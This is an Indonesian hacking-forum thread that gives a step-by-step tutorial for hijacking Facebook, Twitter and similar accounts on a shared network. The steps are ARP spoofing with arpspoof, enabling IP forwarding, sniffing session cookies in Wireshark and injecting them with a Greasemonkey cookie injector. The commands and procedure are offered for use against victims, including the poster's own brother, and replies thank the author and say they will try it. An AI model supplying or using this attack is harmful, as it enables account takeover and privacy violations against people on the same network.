[Share] Hack Facebook Account dengan Cookie Injector
#1
Langsung saja ane mau ngasih tutorial Hack facebook,twitter,dlln dengan metode cookie injector dan MITM ..

MITM apa sih? coba perhatikan gambar dibawah ini
Spoiler! :
[Image: 34es3tt.png]
Spoiler! :
[Image: 15qbyhu.png]
nah gk usah dibahas panjang lebar, lewat gambar itu sudah bisa disimpulkan MITM attack itu apa Big Grin sudah jelas ...

Lanjuutt..

Tools yang dibutuh kan adalah :
-> Browser Mozilla Firefox
-> Greasemonkey (Addons firefox) https://addons.mozilla.org/en-US/firefox...asemonkey/
-> Cookie Injector http://dustint.com/post/12/cookie-inject...easemonkey
-> Arpspoof
-> Nmap / Ether Ape / sejenis IP scanner lainnya, tp dalam tutor ini ane menggunakan ether ape GUI .

langsung saja ..

[hide]
1. Pertama Scanning IP address yang hidup dulu .. (using Ether Ape GUI)
Applications -> Internet -> Ether Ape (as Root) . Atur Capture Interfacenya dengan Wlan0 atau yang Eth0 jg bisa.
Spoiler! :
[Image: 287hvo8.png]

Setelah selesai maka akan ditampilkan IP-IP yg berada dalam subnet kita.

Spoiler! :
[Image: 2jea6hx.png]
nah disana sudah bisa dilihat, ada 3 buah IP numerik . 192.168.1.1 , 192.168.1.3 , 192.168.1.5 .

192.168.1.1 adalah Ip router saya (target2).
192.168.1.5 adalah target saya (target1).
192.168.1.3 adalah Ip saya.

2. Kedua , Setelah mendapat target . kita buka terminal pertama.
Quote:sudo echo 1 >> /proc/sys/net/ipv4/ip_forward
[Image: wuoscx.png]

3. Ketiga, saatnya serangan MITM dengan arpspoof. Ketik diterminal :
Quote:sudo arpspoof -i [interface] -t [target] [Gateway]
Spoiler! :
[Image: 2enw584.png]
[interface] saya menggunakan wlan0
[target] target saya adalah 192.168.1.5
[Gateway] gatway saya adalah 192.168.1.1

Lalu buka terminal baru lalu isi:
Quote:sudo arpspoof -i [interface] -t [Gateway] [target]
Spoiler! :
[Image: 205wq5h.png]
[interface] saya menggunakan wlan0
[target] target saya adalah 192.168.1.5
[Gateway] gatway saya adalah 192.168.1.1
masih tetep sama kayak diatas, tp beda posisi . ini berfungsi untuk kita sebagai orang yg ketiga.

4. Keempat, Install Greasemonkey dan cookie injector di browser mozilla
kita skip aja install graesemonkey, gampang kok .. https://addons.mozilla.org/en-US/firefox...asemonkey/
setelah install greasemonkey, lebih baik restart browsernya dulu biar gk error.
nah, sekarang install cookie injectornya . http://dustint.com/post/12/cookie-inject...easemonkey pilih tulisan INSTALL pojok kanan atas.
Spoiler! :
[Image: v5ipg1.jpg]

untuk mengecek aktif tidaknya cookie injectornya , tekan ALT+C . klo tidak bisa coba restart mozillanya.

sepp langkah ke 4 selesai, maju kelangkah berikutnya..

5. Kelima, Buka wireshark . lewat terminal :
Quote:wireshark
-Pilin interface yang anda gunakan dan Start..
-Kemudian pada Pilhan filter isi dengan : http.cookie contains datr
untuk sniffing Cookie yang ada.

Spoiler! :
[Image: 2eb4xv4.jpg]
Spoiler! :
[Image: 14oaero.png]

-Pada kolom yang warna hitam, yaa tepatnya itu adalah tempat cookienya. cookie yang ingin kita ambil. Caranya klik kanan pada kolom tersebut :
Quote:copy -> bytes -> Printable Text Only
Spoiler! :
[Image: ivb7ee.jpg]

6. Keenam,Buka browser mozilla anda...
-buka halaman facebook .. lalu tekan tombol ALT+C untuk mengaktifkan cookie injectornya ..
-lalu paste kan Cookie yang kita copy tadi pada langkah ke 5. dan klik OK .
Spoiler! :
[Image: 23uy71f.png]
Spoiler! :
[Image: 1979jm.png]

7. Ketujuh, Ini langkah terakhir. Reload Page Facebook anda.. dan anda akan masuk ke facebook korban anda Big Grin
Spoiler! :
[Image: 2lad1sh.png]
Kebetulan korban ane facebook abang ane Big Grin hehehe jadi cuma kenal omel dikit .-.

[/hide]

Sekian tutor saya yang agak singkat, semoga temen-temen sekalian work 100% yaa.. Mohon maaf klo ada salah kata/ketik, maklum namanya jg manusia.
ane udh nyoba beberapa kali work kok Smile klo temen-temen gk work, coba temen-temen minta maaf sama tetangga kiri kanan sapa tau masih ada dosa :v *canda ..



*nb : Perhatikan cookie pada langkah ke 5 , lihat kolom destination dan source .
destination adalah tempat tujuan dari asal IP tersebut , sedangkan
source adalah Asal IP tersebut . Perhatikan IP facebook, twitter dln . klo kalian ambil destinationya facebook tapi dibrowser bukanya twitter yaa gak bakal mau ke inject cookienya. jadi musti sama dengan destination yang cookienya kita ambil..

Referensi :
www.ilmuhacking.com/basic-concept/mengenal-serangan-man-in-the-middle-mitm/
www.youtube.com/watch?v=QaEmSvgQf4w

edited by xsan-lahci Big Grin SS harap di buat spoiler biar lebih enteng di buka
Jangan Makan Tulang Kawan | Kurawa |

#2
mantap bang. ijin nyoba Big Grin

#3
(02-20-2013, 12:03 AM)sonyrimawan Wrote: mantap bang. ijin nyoba Big Grin

iyah mas, silahkan dicoba ... Big Grin
Jangan Makan Tulang Kawan | Kurawa |

#4
mantep om, keren tinggal copas cookies nya gak perlu di atur2 lagi =))
Code:
Username :   [ Hidemichi-Hiroyuki]

Password :   [     ********      ]

#5
keren om, ijin nyoba kayaknya mudah

#6
(02-20-2013, 03:37 AM)[H2] Wrote: mantep om, keren tinggal copas cookies nya gak perlu di atur2 lagi =))

Iyah om, nnti mau ane perbaikin lagi. Coz itu buat tipe ip ipv4, klo ipv6 blom work..
ipv6 ip forwardnya beda sm ipv4 ._.

ipv4
Quote:
Quote:Cek sudah enable atau belom :
cat /proc/sys/net/ipv4/ip_forward
jika 0 maka :
echo 1 > /proc/sys/net/ipv4/ip_forward

ipv6
Quote:
Quote:Cek sudah enable atau belom :
cat /proc/sys/net/ipv6/conf/all/forwarding
jika 0 maka :
echo 1 > /proc/sys/net/ipv6/conf/all/forwarding

atau mungkin ada tambahan yg lain om ?._.

(02-20-2013, 09:25 AM)faisholmjt Wrote: keren om, ijin nyoba kayaknya mudah

iyah om silahkan.. Big Grin
Jangan Makan Tulang Kawan | Kurawa |

#7
cobain facebook ane aja weheehehe Big Grin
orang ane pake security handphone =))

#8
Twitter atau yang lain apa bisa ?.

#9
(02-20-2013, 11:58 AM)aristateles Wrote: Twitter atau yang lain apa bisa ?.

selagi dia masih menggunakan cookie untuk mengidentifikasi user ya bisa Big Grin

CMIIW

#10
(02-20-2013, 11:17 AM)abdilahrf Wrote: cobain facebook ane aja weheehehe Big Grin
orang ane pake security handphone =))

Yaa gak masalah ini kan kasusnya terjadi sitarget sudah Login ke facebook.
jadi istilah kita nyuri cookienya dia yg ada dibrowsernya ke browser kita ._.
selama dia blom logout.. Angry dan sikorban otomatis akan ke logout sendiri .


(02-20-2013, 12:00 PM)abdilahrf Wrote:
(02-20-2013, 11:58 AM)aristateles Wrote: Twitter atau yang lain apa bisa ?.

selagi dia masih menggunakan cookie untuk mengidentifikasi user ya bisa Big Grin

CMIIW

Iyahh betul Smile ...
Jangan Makan Tulang Kawan | Kurawa |






Users browsing this thread: 2 Guest(s)